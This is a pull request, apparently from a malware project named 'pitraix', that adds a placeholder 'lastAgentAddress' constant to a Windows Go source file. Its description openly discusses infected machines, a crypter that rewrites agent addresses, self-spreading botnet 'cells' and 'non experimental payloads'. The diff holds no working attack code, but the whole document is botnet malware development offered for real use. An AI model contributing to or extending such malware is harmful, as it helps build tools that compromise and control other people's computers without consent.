### PR TITLE
ground work for improved crypter structure

### DIFF
--- a/pitraix/lyst_windows.go
+++ b/pitraix/lyst_windows.go
@@ -80,6 +80,8 @@ const (
 
 	// DO NOT CHANGE THIS MANUALLY, RUN OPER
 	agentAddress =".DONT.CHANGE.THIS.RJBLAVLLNXLMNBDDPJPJGKMJJDYDLVQSUIDPZA"
+	
+	lastAgentAddress = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" // 76
 
 
 


### PR DESCRIPTION
Currently the architecture could use more improvements examples when it gets limited: machine infected but operative/agent are offline, the crypter would change the agent address with its own causing a chain where the host making its own botnet! of course with no way for operator to control that cell 

this simple line marks start of non experimental payloads 